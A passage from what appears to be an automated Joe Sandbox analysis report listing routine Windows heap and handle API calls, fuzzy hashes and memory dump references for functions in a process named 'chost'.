                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                        • Instruction ID: 77da75c9d5c2532d6642757488da921f8e489b15e222c87b49855b6ecbea1396
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 38519372B0D641D6FA749A77948067E62A1EB44BA8F14C778EEFD867C5CE3CE441C600
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2976181284-0
                                                                                                                                                                                                                                        • Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                        • Instruction ID: 288b2cef249928aea8583cc93b57c7aaf130ebc51f53ca54a9507e902d315e26
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2611B27161CA8181DA208B36A894169A361EB45BF4F548379EEBD8B7E9CE7CD051C740
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(?,?,?,00007FF694382D92,?,?,?,00007FF694382DCF,?,?,00000000,00007FF694383295,?,?,?,00007FF6943831C7), ref: 00007FF69437A9CE
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF694382D92,?,?,?,00007FF694382DCF,?,?,00000000,00007FF694383295,?,?,?,00007FF6943831C7), ref: 00007FF69437A9D8
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 485612231-0
                                                                                                                                                                                                                                        • Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                                        • Instruction ID: 7c3617d7f28f5b64f1b072b12344b0db9073a03d9f3332ddf701b996349bec2f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B7E04661F1C207C2FF38ABF3A8C51381260EF99B40B4481BCD85DC22A2EE2C6895C300
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CloseHandle.KERNELBASE(?,?,?,00007FF69437AA45,?,?,00000000,00007FF69437AAFA), ref: 00007FF69437AC36
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF69437AA45,?,?,00000000,00007FF69437AAFA), ref: 00007FF69437AC40
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 918212764-0
                                                                                                                                                                                                                                        • Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                        • Instruction ID: 994d99068fe18482eb28fbef6b3132fdbb818ff5e869af92f1b4b1495ce75774
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0D215031B2C68391EAB4677395D02791682DF847A0F0887BDDAAEC77D5CE6CA445D300
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                        • Instruction ID: 9ab76d91146c12c683e9f8f48505d85182839996bd983f3890179b410bd51a70
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D641A432A1C201C7EA349B37A59127977A4EB56B94F108279DACEC77D1CF2DE402CB91
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _fread_nolock
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 840049012-0
                                                                                                                                                                                                                                        • Opcode ID: 8334f334696440ef64ed4453da584d980c1c0ded1461c6629ef7e16216bca0a0
                                                                                                                                                                                                                                        • Instruction ID: 2fa1919d1eb75bb7de06042c7f166b5fec0f4c68b798813cb173d2aed1ecb6bb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8334f334696440ef64ed4453da584d980c1c0ded1461c6629ef7e16216bca0a0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E421F621B0D652A5FE349B3365853BAA651FF49BC8F8C8878EE4C87786CE7DE041C610
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
                                                                                                                                                                                                                                        • Instruction ID: 4138969a18798ce02ba3a310b9bb7c338e5250efa121d14e20c41e60841d6992
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 07313E31A1C642C5E7B16B76848167C3660EB50BA8F5181BDE9AD833D2DE7CB441C721
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3947729631-0
                                                                                                                                                                                                                                        • Opcode ID: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                                                                                                                                                                                                        • Instruction ID: 6e408cad4b90fce7fc6ed67e6c95df8198ed71b5e6b5831ef4927f7495bdc925
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BD217F32A09782CAFB648F79C4842EC33A4EB04728F548679D69D86BD5EF38D544C740
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                        • Instruction ID: 7846faf933c38a9319817f18cf0c2aeb26fee625e99eec61bc176603a3917ccd
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 88115432A1C642C1EA79AF62948027DA264EF95B80F94807DEBCCD7E96DF3DE440C700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                        • Instruction ID: 18b7f6026fffbf18c35cf9c540faf7e0e14103eaa1544f07c85eaf2fddd62a22
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC21537261864186DB718F2AD48037DB6A1EB84B54F64C278E69DC77D5DF7CD401CB00
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                        • Instruction ID: d06a6e3bc6d496ccfc456157caa01151f5c99b5d23cfc8bb8685d1509816ee5a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35018271A4C74180E924DF639981069A6A1EF85FE4B588679DE9C97BD6DE3CE101C700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: 6832eb5f98ca96f5e7cd25db8366a3c1a8b2d6b45623d2691d830cdd3d76c9ad
                                                                                                                                                                                                                                        • Instruction ID: 95280e2d63b2beb2ebc8aa08208ffa94789011b6006ea3a49d0b2a1a405a8775
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6832eb5f98ca96f5e7cd25db8366a3c1a8b2d6b45623d2691d830cdd3d76c9ad
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BA016930A1D682C0FEB4AA7366C117962D0EF047A0F54C6BDEA9CC2BC6DF6CB451C611
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
                                                                                                                                                                                                                                        • Instruction ID: 58937605b51a4778ffaa95c006d5929aa208b1e18270b931b99b5550bb3b4668
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 24E0ECB0E0C607C6F7793AB646C217D1150DF56341F81C6BCEA88962C3DE2C7859D721
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(?,?,00000000,00007FF69437B39A,?,?,?,00007FF694374F81,?,?,?,?,00007FF69437A4FA), ref: 00007FF69437EC5D
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4292702814-0
                                                                                                                                                                                                                                        • Opcode ID: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
                                                                                                                                                                                                                                        • Instruction ID: 674846394c72135350ec9c416d6339bf667f1bd8d8ed196622426a5546e8b49d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5EF0F968B0D207C1FE755A7799E23B95A94DF89B81F4CD5B8C98EC63D2EE1CA481C210
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(?,?,?,00007FF694370D00,?,?,?,00007FF69437236A,?,?,?,?,?,00007FF694373B59), ref: 00007FF69437D6AA
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4292702814-0
                                                                                                                                                                                                                                        • Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                                        • Instruction ID: c4e8d760e671bee1265a566b8a3fe97f7fe7e1bef0c549d29f9bc483c7ea1201
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 28F03420A2D30284FE74667358D12B95290CF94BA0F8882B8D8AEC53C2EE2CB480C620
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressErrorLastProc
